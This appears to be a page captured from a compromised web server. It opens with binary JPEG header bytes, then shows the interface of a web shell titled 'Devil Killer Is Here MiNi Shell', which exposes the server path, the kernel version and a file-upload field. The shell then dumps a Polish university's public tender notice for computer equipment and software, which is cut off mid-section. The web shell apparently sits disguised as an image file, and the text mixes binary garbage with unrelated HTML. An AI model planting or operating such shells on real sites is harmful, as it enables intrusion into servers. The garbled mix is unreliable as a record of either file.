JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211230/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211230/0033982201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa II części urządzeń komputerowych i akcesoriów, urządzeń wielofunkcyjnych oraz oprogramowania dla PWSZ w Tarnowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowa Wyższa Szkoła Zawodowa w Tarnowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851634303</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mickiewicza 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tarnów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">14 63 16 500</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">14 63 16 600</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rektorat@pwsztar.edu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pwsztar.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa II części urządzeń komputerowych i akcesoriów, urządzeń wielofunkcyjnych oraz oprogramowania dla PWSZ w Tarnowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e26a021b-68ff-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00339822</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00117758/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa II części urządzeń komputerowych i akcesoriów, urządzeń wielofunkcyjnych oraz oprogramowania dla PWSZ w Tarnowie.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pwsztar.edu.pl/tryb-podstawowy-dostawa-ii-czesci-urzadzen-komputerowych-dla-pwsz-w-tarnowie-30-12-2021-r <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej:<br/>1)	miniPortalu, https://miniportal.uzp.gov.pl/ <br/>2)	ePUAPu https://epuap.gov.pl/wps/portal<br/>3)	poczty elektronicznej e_tomal@pwsztar.edu.pl <br/>z zastrzeżeniem, iż oferta musi zostać złożona przy użyciu miniPortalu.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje dotyczące wymagań technicznych i organizacyjnych dotyczących korespondencji elektronicznej zawarte zostały w rozdziale 12 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych zawarta została Zgodnie w rozdziale 24 Specyfikacji Warunków Zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">L.Dz./K-dzpz/382-13/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa urządzeń komputerowych, w tym:<br/>1)	Zestaw komputerowy nr 1 – 19 szt. <br/>2)	Zestaw komputerowy nr 2 – 3 szt.<br/>3)	Zestaw komputerowy nr 3 – 2 szt.<br/>Szczegółowy opis zamówienia określa załącznik nr 3A do SWZ.<br/>Minimalny okres gwarancji na przedmiot zamówienia – 24 miesiące. Okres gwarancji stanowi kryterium oceny ofert. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie kierował następującymi kryteriami oceny ofert:<br/> 1. Cena	60%<br/> 2. Okres gwarancji	20%<br/> 3. Termin realizacji	20%<br/><br/>2.	Punkty przyznawane za kryteria podane w pkt 1 będą liczone według następujących wzorów:<br/><br/> 1.	Cena:	Punkty w kryterium oceny ofert – 60% (60 pkt)<br/>Liczba punktów = (Cmin/Cof) * Wc * 100, gdzie:<br/>Cmin – najniższa cena zł brutto spośród wszystkich ofert<br/>Cof – cena zł brutto podana w badanej ofercie <br/>Wc – waga kryterium cena<br/><br/> 2.	Okres gwarancji	Punkty w kryterium oceny ofert – 20% (20 pkt)<br/>	Liczba punktów = ((Gof-Gmin)/(Gmax-Gmin)) * Wg * 100, gdzie:<br/>	Gmin – minimalny okres gwarancji, który jest wymagany od każdego Wykonawcy (24 miesiące)<br/>	Gmax – maksymalny okres gwarancji (36 miesięcy)<br/>	Gof – okres gwarancji podany w badanej ofercie (liczba miesięcy)<br/>	Wg – waga kryterium okres gwarancji<br/><br/> 3.	Termin realizacji:	Punkty w kryterium oceny ofert – 20% (20 pkt)<br/>	Liczba punktów = ((Tmax-Tof)/(Tmax-Tmin)) * Wt * 100, gdzie:<br/>	Tmin – minimalny punktowany termin realizacji (28 dni) <br/>	Tmax – maksymalny termin realizacji (42 dni)<br/>	Tof – termin realizacji podany w badanej ofercie (liczba dni)<br/>	Wt – waga kryterium termin realizacji<br/>	Uwaga! W przypadku zaproponowania przez Wykonawcę terminu realizacji krótszego niż 28 dni, do badania ofert zostanie przyjęty Tof=Tmin=28 dni<br/><br/>Uwaga! Oferowany okres gwarancji/termin realizacji należy wskazać w formularzu oferty stanowiącym załącznik nr 1 do SWZ. W przypadku braku wskazania okresu gwarancji/terminu realizacji, Zamawiający przyzna Wykonawcy 0 pkt jako zaoferowanie najkrótszego okresu gwarancji/najdłuższego terminu realizacji.<br/><br/>3.	Po dokonaniu ocen w danej części, punkty przyznane w ramach każdego z kryteriów dotyczących tej części zostaną zsumowane. Suma punktów uzyskanych za wszystkie kryteria oceny w danej części zamówienia stanowić będzie końcową ocenę oferty w tej części.<br/>4.	Wszystkie obliczenia punktów będą dokonywane z dokładnością do dwóch miejsc po przecinku (bez zaokrągleń).<br/>5.	Za ofertę najwyżej ocenioną w danej części zamówienia zostanie uznana oferta, która otrzyma największą liczbę punktów w tej części.<br/>6.	Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa urządzeń wielofunkcyjnych, w tym:<br/>1)	Urządzenie wielofunkcyjne nr 1 – 1 szt.<br/>2)	Toner do kserokopiarki – 1 szt.<br/>3)	Urządzenie wielofunkcyjne nr 2 – 12 szt.<br/>4)	Toner do urządzenia wielofunkcyjnego – 12 szt.<br/>5)	Moduł bębna światłoczułego do urządzenia wielofunkcyjnego – 10 szt.<br/>6)	Drukarka kolorowa A3 – 1 szt.<br/>7)	Toner do drukarki czarny – 2 szt.<br/>8)	Toner do drukarki cyan – 2 szt. <br/>9)	Toner do drukarki magenta – 2 szt.<br/>10)	Toner do drukarki żółty – 2 szt.<br/>11)	Bęben światłoczuły do drukarki czarny – 1 szt.<br/>12)	Bęben światłoczuły do drukarki cyan – 1 szt.<br/>13)	Bęben światłoczuły do drukarki magenta - 1 szt.<br/>14)	Bęben światłoczuły do drukarki żółty – 1 szt.<br/>15)	Urządzenie wielofunkcyjne kolorowe – 2 szt.<br/>16)	Toner do urządzenia wielofunkcyjnego czarny – 4 szt.<br/>17)	Toner do urządzenia wielofunkcyjnego cyan – 4 szt. <br/>18)	Toner do urządzenia wielofunkcyjnego magenta – 4 szt. <br/>19)	Toner do urządzenia wielofunkcyjnego żółty – 4 szt.<br/>Szczegółowy opis zamówienia określa załącznik nr 3B do SWZ.<br/>Minimalny okres gwarancji na przedmiot zamówienia – 24 miesiące. Okres gwarancji stanowi kryterium oceny ofert. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30120000-6 - Urządzenia fotokopiujące i do druku offsetowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30200000-1 - Urządzenia komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie kierował następującymi kryteriami oceny ofert:<br/> 1. Cena	60%<br/> 2. Okres gwarancji	20%<br/> 3. Termin realizacji	20%<br/><br/>2.	Punkty przyznawane za kryteria podane w pkt 1 będą liczone według następujących wzorów:<br/><br/> 1.	Cena:	Punkty w kryterium oceny ofert – 60% (60 pkt)<br/>Liczba punktów = (Cmin/Cof) * Wc * 100, gdzie:<br/>Cmin – najniższa cena zł brutto spośród wszystkich ofert<br/>Cof – cena zł brutto podana w badanej ofercie <br/>Wc – waga kryterium cena<br/><br/> 2.	Okres gwarancji	Punkty w kryterium oceny ofert – 20% (20 pkt)<br/>	Liczba punktów = ((Gof-Gmin)/(Gmax-Gmin)) * Wg * 100, gdzie:<br/>	Gmin – minimalny okres gwarancji, który jest wymagany od każdego Wykonawcy (24 miesiące)<br/>	Gmax – maksymalny okres gwarancji (36 miesięcy)<br/>	Gof – okres gwarancji podany w badanej ofercie (liczba miesięcy)<br/>	Wg – waga kryterium okres gwarancji<br/><br/> 3.	Termin realizacji:	Punkty w kryterium oceny ofert – 20% (20 pkt)<br/>	Liczba punktów = ((Tmax-Tof)/(Tmax-Tmin)) * Wt * 100, gdzie:<br/>	Tmin – minimalny punktowany termin realizacji (28 dni) <br/>	Tmax – maksymalny termin realizacji (42 dni)<br/>	Tof – termin realizacji podany w badanej ofercie (liczba dni)<br/>	Wt – waga kryterium termin realizacji<br/>	Uwaga! W przypadku zaproponowania przez Wykonawcę terminu realizacji krótszego niż 28 dni, do badania ofert zostanie przyjęty Tof=Tmin=28 dni<br/><br/>Uwaga! Oferowany okres gwarancji/termin realizacji należy wskazać w formularzu oferty stanowiącym załącznik nr 1 do SWZ. W przypadku braku wskazania okresu gwarancji/terminu realizacji, Zamawiający przyzna Wykonawcy 0 pkt jako zaoferowanie najkrótszego okresu gwarancji/najdłuższego terminu realizacji.<br/><br/>3.	Po dokonaniu ocen w danej części, punkty przyznane w ramach każdego z kryteriów dotyczących tej części zostaną zsumowane. Suma punktów uzyskanych za wszystkie kryteria oceny w danej części zamówienia stanowić będzie końcową ocenę oferty w tej części.<br/>4.	Wszystkie obliczenia punktów będą dokonywane z dokładnością do dwóch miejsc po przecinku (bez zaokrągleń).<br/>5.	Za ofertę najwyżej ocenioną w danej części zamówienia zostanie uznana oferta, która otrzyma największą liczbę punktów w tej części.<br/>6.	Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa oprogramowania, w tym:<br/>1)	Windows 2019 Server Standard Edition wersja akademicka (MOLP) – 4 szt.<br/>2)	Windows Server 2019 User CAL – 100 szt.<br/>3)	Microsoft Office Professional Plus 2019 MOLP EDU – 132 szt.<br/>4)	Microsoft Windows 10 Home BOX – 35 szt.<br/>Szczegółowy opis zamówienia określa załącznik nr 3C do SWZ.<br/>Minimalny okres gwarancji na przedmiot zamówienia – 24 miesiące. Okres gwarancji stanowi kryterium oceny ofert. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48000000-8 - Pakiety oprogramowania i systemy informatyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie kierował następującymi kryteriami oceny ofert:<br/> 1. Cena	60%<br/> 2. Okres gwarancji	20%<br/> 3. Termin realizacji	20%<br/><br/>2.	Punkty przyznawane za kryteria podane w pkt 1 będą liczone według następujących wzorów:<br/><br/> 1.	Cena:	Punkty w kryterium oceny ofert – 60% (60 pkt)<br/>Liczba punktów = (Cmin/Cof) * Wc * 100, gdzie:<br/>Cmin – najniższa cena zł brutto spośród wszystkich ofert<br/>Cof – cena zł brutto podana w badanej ofercie <br/>Wc – waga kryterium cena<br/><br/> 2.	Okres gwarancji	Punkty w kryterium oceny ofert – 20% (20 pkt)<br/>	Liczba punktów = ((Gof-Gmin)/(Gmax-Gmin)) * Wg * 100, gdzie:<br/>	Gmin – minimalny okres gwarancji, który jest wymagany od każdego Wykonawcy (24 miesiące)<br/>	Gmax – maksymalny okres gwarancji (36 miesięcy)<br/>	Gof – okres gwarancji podany w badanej ofercie (liczba miesięcy)<br/>	Wg – waga kryterium okres gwarancji<br/><br/> 3.	Termin realizacji:	Punkty w kryterium oceny ofert – 20% (20 pkt)<br/>	Liczba punktów = ((Tmax-Tof)/(Tmax-Tmin)) * Wt * 100, gdzie:<br/>	Tmin – minimalny punktowany termin realizacji (28 dni) <br/>	Tmax – maksymalny termin realizacji (42 dni)<br/>	Tof – termin realizacji podany w badanej ofercie (liczba dni)<br/>	Wt – waga kryterium termin realizacji<br/>	Uwaga! W przypadku zaproponowania przez Wykonawcę terminu realizacji krótszego niż 28 dni, do badania ofert zostanie przyjęty Tof=Tmin=28 dni<br/><br/>Uwaga! Oferowany okres gwarancji/termin realizacji należy wskazać w formularzu oferty stanowiącym załącznik nr 1 do SWZ. W przypadku braku wskazania okresu gwarancji/terminu realizacji, Zamawiający przyzna Wykonawcy 0 pkt jako zaoferowanie najkrótszego okresu gwarancji/najdłuższego terminu realizacji.<br/><br/>3.	Po dokonaniu ocen w danej części, punkty przyznane w ramach każdego z kryteriów dotyczących tej części zostaną zsumowane. Suma punktów uzyskanych za wszystkie kryteria oceny w danej części zamówienia stanowić będzie końcową ocenę oferty w tej części.<br/>4.	Wszystkie obliczenia punktów będą dokonywane z dokładnością do dwóch miejsc po przecinku (bez zaokrągleń).<br/>5.	Za ofertę najwyżej ocenioną w danej części zamówienia zostanie uznana oferta, która otrzyma największą liczbę punktów w tej części.<br/>6.	Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) 